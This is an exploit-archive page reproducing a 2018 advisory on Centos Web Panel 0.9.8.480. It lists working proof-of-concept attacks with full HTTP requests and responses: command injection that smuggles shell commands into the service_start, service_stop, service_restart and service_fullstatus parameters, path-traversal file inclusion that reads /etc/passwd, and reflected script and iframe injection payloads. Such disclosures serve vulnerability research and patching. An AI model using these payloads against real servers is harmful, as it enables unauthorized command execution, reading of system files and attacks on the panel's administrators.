exploit the possibilities

Centos Web Panel 0.9.8.480 XSS / LFI / Code Execution

Centos Web Panel 0.9.8.480 XSS / LFI / Code Execution
Posted Oct 15, 2018
Authored by Siber Guvenlik Hizmetleri

Centos Web Panel version 0.9.8.480 suffers from code execution, cross site scripting, and local file inclusion vulnerabilities.

tags | exploit, web, local, vulnerability, code execution, xss, file inclusion
systems | linux, centos
advisories | CVE-2018-18322, CVE-2018-18323, CVE-2018-18324
MD5 | e7fc8ff71e4d7349b20722fdec06c3b3

Centos Web Panel 0.9.8.480 XSS / LFI / Code Execution

Change Mirror Download
# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities
# Exploit Author: Seccops - Siber GA1/4venlik Hizmetleri (https://seccops.com)
# Vendor Homepage: http://centos-webpanel.com/
# Software Link: http://centos-webpanel.com/system-requirements
# Version: 0.9.8.480
# Tested on: Centos 7
# Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection
# CVE: -

### Vulnerability Name: Command Injection ###

1)
Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x
Parameter Name: service_start
Parameter Type: GET
Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx

HTTP Request:

GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1
Host: localhost:2030
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
Referer: http://localhost:2030/admin/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36

Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239.

HTTP Response:

HTTP/1.1 200 OK
Server: cwpsrv
X-Powered-By: PHP/7.0.24
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Mon, 01 Oct 2018 21:06:42 GMT
Cache-Control: no-store, no-cache, must-revalidate

HTML Content:

<div class='alert alert-warning'>
<button type='button' class='close' data-dismiss='alert'>A</button>
<strong>WARNING!</strong> <pre>268409239
sh: x.service: command not found
</pre><br>

2)
Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x
Parameter Name: service_restart
Parameter Type: GET
Attack Pattern: sshd%3bexpr+268409241+-+2%3bx

3)
Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x
Parameter Name: service_fullstatus
Parameter Type: GET
Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx

4)
Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x
Parameter Name: service_stop
Parameter Type: GET
Attack Pattern: named%3bexpr+268409241+-+2%3bx

### Vulnerability Name: Local File Inclusion ###

1)
Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
Parameter Name: file
Parameter Type: GET
Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

HTTP Request:

GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: localhost:2030
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
Referer: http://localhost:2030/admin/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36

HTTP Response:

HTTP/1.1 200 OK
Server: cwpsrv
X-Powered-By: PHP/7.0.24
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Mon, 01 Oct 2018 20:45:19 GMT
Cache-Control: no-store, no-cache, must-revalidate

HTML Content:
File info <a href='index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd&stats=yes'>[stats]</a>:<pre>-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd
</pre><h3>Contents of File: /../../../../../../../../../../../etc/passwd</h3>
<form action='' method= 'post'>
<textarea id='textarea' name='newd' cols='100%' rows='50'>root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
etc...

### Vulnerability Name: Cross-site Scripting & Frame Injection ###

1)
Proof URL: http://localhost:2030/admin/fileManager2.php?frame=3&action=8&cmd_arg=design&fm_current_dir=<scRipt>alert(1)</scRipt>
Parameter Name: fm_current_dir
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

2)
Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&file=/etc/sysconfig/selinux
Parameter Name: module
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

3)
Proof URL: http://localhost:2030/admin/index.php?service_start=<scRipt>alert(1)</scRipt>
Parameter Name: service_start
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

4)
Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=<scRipt>alert(1)</scRipt>
Parameter Name: service_fullstatus
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

5)
Proof URL: http://localhost:2030/admin/index.php?service_restart=<scRipt>alert(1)</scRipt>
Parameter Name: service_restart
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

6)
Proof URL: http://localhost:2030/admin/index.php?service_stop=<scRipt>alert(1)</scRipt>
Parameter Name: service_stop
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

7)
Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=<scRipt>alert(1)</scRipt>
Parameter Name: file
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

8)
Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&dir=/var/log
Parameter Name: module
Parameter Type: GET
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    11 Files
  • 25
    Apr 25th
    10 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close